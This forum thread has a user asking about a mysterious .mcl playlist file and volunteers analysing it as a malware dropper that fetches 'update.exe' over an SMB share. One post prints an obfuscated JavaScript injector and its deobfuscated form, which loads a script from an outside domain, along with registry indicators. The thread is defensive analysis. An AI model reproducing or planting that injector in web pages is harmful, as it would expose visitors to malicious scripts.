.mcl Virus?

Viruses and worms
21

No problems per se, but I’ve kept my computer offline, except when posting here, since it happened.

Does that mean it is from Amazon? Because after reading this: http://blog.trendmicro.com/trendlabs-security-intelligence/windows-media-center-hacking-team-bug-fixed-in-september-2015-patch-tuesday/ the way I understood it was that this file type (normally to do with Windows Media Center) shouldn’t be able to execute code, and the fact it can is a security flaw.

I might have had Amazon open, but I closed my tabs too quickly and can’t remember what pages were open at the time.

The most worrying part for me, as I mentioned before, is that it downloaded itself so suddenly – how is it possible for that to happen at all? @_@

Thanks for your help.

22

I mean, the security flaw has apparently been fixed in a Windows Update, so how it got there is definitely my biggest concern.

23

Sorry for posting again, but I forgot to mention that after the computer restarted when I tried the fixlist.txt file, the mouse became incredibly laggy and moved at about 1fps! It stayed like that for a minute or so.

Maybe irrelevant, but that doesn’t normally happen…

24

Before I go to sleep, one last observation.
I have the Avast Online Security extension on Chrome, and it seems to be behaving unusually.

  1. It doesn’t display the icon next to Google results to say if the site is safe (I think it was a green tick icon? It’s gone now, and was there before, I changed nothing).

  2. It said this site (forum.avast.com) is an unknown site (but has now changed to safe).

I hope to have an reply in the morning, I’m sorry I keep posting, I am worried…

25

As MS has patched windows then it is of no concern and you are safe. I have never seen that type of text before, but it is used by youtube if you have a multiple set of videos to play

Could you check AOS settings and ensure that they are as they should be

26

I checked my Avast Online Security extension settings.
They seem fine, however in Incognito mode the green ticks do not appear next to the results.

I understand that this file itself can do no harm as it is patched.
I am more concerned about how it downloaded, since I am still unsure what the implications of that are on my machine.

I am not sure what you mean about the “type of text” you haven’t seen before, and how it all relates to YouTube and Amazon.
If the file is not intended to be malicious, what does the code mean, why is it saved in a .mcl file type which normally relates to Windows Media Center, and why did it suddenly download itself with no input from me? And why is the first recorded instance of it, according to virustotal.com, in the last couple of days?

I’m sorry for being an idiot, but I don’t understand fully… :(

27

Also the Avast Internet Security icon has a number next to it displaying how many tracking systems are on the site.
That was almost definitely there all along, but just in case… :stuck_out_tongue:

(I know I’m an idiot, but I didn’t notice that before. Just trying to give all the information. :P)

28

Yes, this is definetly malicious. The “exploit” is simple: Somehow they managed to download a playlist file to you, which will run an application. As you can see in the text-file:

If this file is executed, it is supposed to download the above file via an SMB share (which you can see because it starts with a \\, it's a network share). At the time of this post, the IP supresses any ping requests, but the SMB share is still up and running. In the \Users directory, there's an "Administartor" and a "Public" folder, but there's no files on it except for the file mentioned above. In this directory you will find a 4.25 MB big file "update.exe", created on October 12th 2015, according to the metadata. Here's a virustotal link: https://www.virustotal.com/de/file/084fa217f3acad97b5f9e95ee776f8fd85dfe6dbfd12194b10102e37f29bb4b0/analysis/1444926798/. If you unpack this .exe file, you will see the files it will try to install: 
15.10.2015  21:05    <DIR>          .
15.10.2015  21:05    <DIR>          ..
15.10.2015  21:05    <DIR>          $PLUGINSDIR
15.10.2015  21:05    <DIR>          $SYSDIR
15.10.2015  21:05    <DIR>          $WINDIR
04.10.2015  05:41           303.104 freebl3.dll
04.10.2015  05:41           295.424 libnspr4.dll
04.10.2015  05:41            48.640 libplc4.dll
04.10.2015  05:41            46.080 libplds4.dll
04.10.2015  05:41           184.224 N1Cert.dll
04.10.2015  05:41           284.544 N1LSP.exe
04.10.2015  05:41               116 N1LSP.ini
04.10.2015  05:41           328.560 N1LSP64.exe
04.10.2015  05:41           324.760 N1Service.dll
04.10.2015  05:41         1.314.616 N1Service.exe
04.10.2015  05:41            51.936 N1Service.tlb
04.10.2015  05:41           370.744 N1Service64.dll
04.10.2015  05:41           847.872 NMI.dll
04.10.2015  05:41           854.528 nss3.dll
04.10.2015  05:41           417.280 nssckbi.dll
04.10.2015  05:41           164.352 nssdbm3.dll
04.10.2015  05:41           135.680 nssutil3.dll
04.10.2015  05:41            51.936 PCProxy.tlb
04.10.2015  05:41           132.608 smime3.dll
04.10.2015  05:41           230.400 softokn3.dll
04.10.2015  05:41           455.168 sqlite3.dll
04.10.2015  05:41           228.352 ssl3.dll

Most notably, the files inside “$Sysdir” with the names “N1Service.ini” and “N1ServiceOff” indicate that some services will be installed on your computer, and under “$WINDIR\msservice\MSService.xml” you will even find a nice javascript which will be injected in your webbrowser.

document.write("<scr" + "ipt type='text/javascript'>var d='.'; var tld='xyz'; var dm='nwcdn'; var analytics='b'; var e='js'; var f='placement';");
document.write("</" + "scr" + "ipt>");
document.write("<scr" + "ipt type='text/javascript' src='//" + analytics + d + dm + d + tld + "/" + f + d + e + "'>");
document.write("</" + "scr" + "ipt>");

The document.write()s can be deobfuscated to

<script type='text/javascript'>var d='.'; var tld='xyz'; var dm='nwcdn'; var analytics='b'; var e='js'; var f='placement';
</script>
<script type='text/javascript' src='//b.nwcdn.xyz/placement.js'> </script>

A malwr.com analysis further shows that it

Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) Installs itself for autorun at Windows startup
The "N1LSP.exe" is part of the "Network Manager Suite", published by "Nite Media LLC" (this seems to be actually legit software according to [url=http://"http://appquantify.com/p154964-network-manager-suite.aspx"]this[/url]), which runs approx. 0.5 seconds after the update.exe is executed, according to the malwr.com behavior analysis. So all in all, seems like a good package of malware and surveilence software which the "update.exe" tries to download and execute on your computer. Especially look to clean up for any services and files which are listed above.
29

Thanks for your post.

I can’t say I understand everything here, but it is helpful information.

I didn’t click the file, so what is the situation for me? Will it have installed at Startup? I ask because in your last quote it says “Installs itself for autorun at Windows startup”.
There is no “Administrator” folder in the “/Users” directory, but there is a “Public” folder.

And do you have a clue how they managed to download the file to my machine?

I will not make any changes to my machine solely based on your input, however, because you are not an established member. I hope you understand why.

30

Also, what is a SMB share?

31

The file did not activate on your system as Avast would have alerted on the exe file and javascript

It was probably a driveby download https://en.wikipedia.org/wiki/Drive-by_download

32
I didn't click the file, so what is the situation for me? And do you have a clue how they managed to download the file to my machine?
If the file didn't get executed, there's nothing to fear. Just like you would download an .exe file but never executed it. [b]However[/b], chances are, since the playlist.mcl magically showed up in your Chrome, that the original exploit (the previous people discussed a zero-day exploit for Windows) triggered the download of the playlist.mcl, which in turn, when executed, downloaded and executed the "update.exe" from the SMB share mentioned above. In that case, the exploit would have executed the payload for you. So we're talking about a 4-stage process here (original exploit (browser drive-by or exploit / Windows zero-day) -> download and execute playlist.mcl -> download and execute 'update.exe' from a rented Amazon server via SMB -> installs services and maybe additional malware). It's hard to say post-action what exactly has triggered the download of that file. As mentioned above, it could be a browser drive-by download or some other browser exploit from a malicious site you visited, could be because of the exploitation of recent Windows vulnerabilites, could be already installed malware that did this, so I'm also agreeing with
It was probably a driveby download https://en.wikipedia.org/wiki/Drive-by_download
on this.
There is no "Administrator" folder in the "/Users" directory, but there is a "Public" folder.
Here I was refering to the machine that provides the "update.exe" file (the rented Amazon-Cloud machine), not your local machine, so that's not relevant to you.
Also, what is a SMB share?
SMB (or "Samba", in Linux speak) is the network-drive sharing service on Windows. You can share your local files over the network with this network service, you may know that as the feature that says "Share files and directories over the network" in your network control center in the control panel. That is the way they distributed the 'update.exe' to you, by making the file pubically accessible through a SMB share.
One more thing could be interesting: Did Chrome report where the playlist.mcl was downlaoded from? There's a "copy downloadlink" option in the right-click menu for every downloaded file inside Chrome. Something that will have definetly left a trace is the installation of the windows service, if the "update.exe" ever got executed. You can search your activity logs (Event Viewer) in Windows for when the "N1LSP.exe" (or similiar filename) were installed on your computer, [b]if[/b] you didn't already revert back with a system restore or something. Also, from the malwr.com analysis, it writes itself in the registry, under the keys "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellCompatibility\Applications\update.exe" and " HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellCompatibility\Objects\{20D04FE0-3AEA-1069-A2D8-08002B30309D}" (use regedit.exe to confirm this).
33

I always use Incognito Mode in Chrome, because I do not need a Web History. This unfortunately means my “Downloads” (CTRL+J) are wiped when I close Chrome.
I will try the other two things you mentioned (Event Viewer and Registry).

I’m sorry for misinterpreting what you said. I thought you meant my machine because you followed it with “In this directory you will find a 4.25 MB big file “update.exe”, created on October 12th 2015, according to the metadata”, so I assumed I should look for this file on my local machine.
I’m not sure what this meant if you are not referring to my local machine (but really, I don’t understand half of this… :P).

34

How do I access the necessary activity log in Event Viewer?

35

I could not find either of those keys in those locations in the registry (regedit.exe).

Then, I typed both “update.exe” and “{20D04FE0-3AEA-1069-A2D8-08002B30309D}” into “Find…” to be sure.
“update.exe” search resulted in a few Google Update-related things.
“{20D04FE0-3AEA-1069-A2D8-08002B30309D}” was present in various locations, but not where you mentioned.

I’m sure that is all irrelevant though – I could not find them in the locations you mentioned.

36

What he posted was a list of the malware infection points… You do not have this at all…

It was neutered before it was activated when you closed chrome

37

I’m confused, sorry…

Does this not mean I may have malware on my machine?

I’m trying to be helpful, I thought this was directed at me, so was looking at those things…

Sorry for being so hopelessly confused by all this… :-\ ::slight_smile:

38
Does this not mean I may have malware on my machine?
If so essexboy would have found it ;)
39

I’m still not sure of the exact situation (and would appreciate a recap :P) but does this mean I can delete the original file (now renamed to playlist.txt)?
Can I go on using my computer as usual, or are there still unanswered questions that mean it would be wise to wait…?

Can someone explains what this means, if it isn’t addressed to me? It seems like pseud0randomness is telling me to check things such as activity logs (Event Viewer) , but apparently not…?

40

It’s alright, it was already determined that the update.exe didn’t fire and that you have no signs of infection in regards to that malware. My post just contained some points where you could have a look at in order to verify that again. So as it seems, your computer is free of that malware.
Also, we can celebrate a success: After filing an abuse report for the amazon AWS instance which distributed the malware to you, I received:

Dear Abuse Reporter,

Thank you for submitting your abuse report.

We’ve determined that an Amazon EC2 instance was running at the IP address you provided in your abuse report. We’ll investigate the complaint to determine what additional actions, if any, need to be taken in this case.
Thanks again for alerting us to this issue.


And the download link is now down.